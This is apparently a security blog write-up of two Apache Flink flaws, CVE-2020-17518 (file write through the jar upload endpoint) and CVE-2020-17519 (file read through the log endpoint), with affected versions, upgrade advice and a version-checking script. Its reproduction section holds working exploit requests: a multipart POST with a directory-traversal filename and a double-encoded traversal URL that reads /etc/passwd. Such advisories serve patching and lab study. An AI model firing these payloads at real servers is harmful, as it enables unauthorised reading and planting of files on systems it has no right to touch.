Apache Flink (File write vulnerability/file read vulnerability)

CVE-2020-17518/17519


I. Vulnerability description

The core of Apache Flink is a streaming dataflow execution engine that provides data distribution, communication and fault tolerance for distributed computation over data streams. Flink 1.5.1 introduced a REST handler for the JobManager's REST API, and flaws in the implementation of that API allowed directory traversal in two places: the jar upload path (file write) and the log-file download path (file read).

CVE-2020-17518: File write vulnerability

Through the REST API's jar upload endpoint, an attacker who controls the filename in the multipart Content-Disposition header can make the server write the uploaded file to any location on the local file system that the Flink process is allowed to write to, because the filename is joined onto the upload directory without being normalised.

CVE-2020-17519: File read vulnerability

Apache Flink 1.11.0 (and 1.11.1, 1.11.2) allows an unauthenticated attacker to read any file on the JobManager's local file system that the JobManager process can read, through the log-file endpoint of the JobManager's REST API.

II. Affected versions

CVE-2020-17518 (file write): Apache Flink 1.5.1 to 1.11.2

CVE-2020-17519 (file read): Apache Flink 1.11.0 to 1.11.2

III. Reproduction

Environment Address:

Github.com/vulhub/vulh…

CVE-2020-17518: File write vulnerability

POST /jars/upload HTTP/1.1
Host: IP:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 189

------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/sucess"

success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--

To confirm the write, read the file back through the JobManager log endpoint (this uses the CVE-2020-17519 traversal, so it only works against 1.11.0 to 1.11.2; on older versions check for /tmp/sucess on the host directly). Do not rely on the upload response code: the jar handler may reject a name that does not end in .jar, but the multipart parser has already written the file by then.

http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsucess


CVE-2020-17519: File read vulnerability

http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

Requesting this path returns the contents of /etc/passwd. The traversal is percent-encoded twice (%252f): the server decodes it once to %2f while routing, so the whole filename is still a single path segment without a literal "/", and the log-file handler decodes it a second time to "../" before joining it onto the log directory.

IV. Remediation

Upgrade to Flink 1.11.3 or 1.12.0, which fix both issues. Download links:

Flink.apache.org/downloads.h…

Flink.apache.org/downloads.h…
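A triage helper for the remediation step, added here as an example (not code from the original post or the Flink project). It reads the version a JobManager advertises on its REST API and reports which of the two CVEs apply, using the affected ranges given above and the fixed versions 1.11.3 / 1.12.0. It assumes the unauthenticated GET /config endpoint, whose JSON response carries a "flink-version" field; the function names are my own.

```python
"""Triage helper: read a JobManager's advertised version and say which of
the two CVEs apply. Added example, not from the post or the Flink project.
Assumes the REST endpoint GET /config, which returns JSON containing a
'flink-version' field (for example "1.11.2")."""
from __future__ import annotations

import json
import urllib.request

# Inclusive affected ranges from the Flink advisories.
AFFECTED = {
    "CVE-2020-17518": ((1, 5, 1), (1, 11, 2)),   # write via POST /jars/upload
    "CVE-2020-17519": ((1, 11, 0), (1, 11, 2)),  # read via GET /jobmanager/logs/
}
FIXED_IN = ("1.11.3", "1.12.0")


def parse_version(text: str) -> tuple[int, ...]:
    """'1.11.2', '1.11.2-SNAPSHOT' or '1.12.0-rc1' -> (1, 11, 2), (1, 12, 0)."""
    core = text.strip().split("-", 1)[0]
    return tuple(int(part) for part in core.split("."))


def affected_cves(version: str) -> list[str]:
    """CVE identifiers whose inclusive range contains the given version."""
    v = parse_version(version)
    return [cve for cve, (low, high) in AFFECTED.items() if low <= v <= high]


def check_target(base_url: str) -> tuple[str, list[str]]:
    """Network call: fetch /config and classify the advertised version."""
    with urllib.request.urlopen(base_url + "/config", timeout=10) as resp:
        version = json.load(resp)["flink-version"]
    return version, affected_cves(version)


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8081"
    ver, cves = check_target(target)
    if cves:
        print(f"{ver} is affected by {', '.join(cves)}; upgrade to {' or '.join(FIXED_IN)}")
    else:
        print(f"{ver} is not in an affected range")
```

Note that a version outside the affected ranges only means these two CVEs do not apply; it says nothing about whether the REST port should be reachable from the network at all.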


thelostworld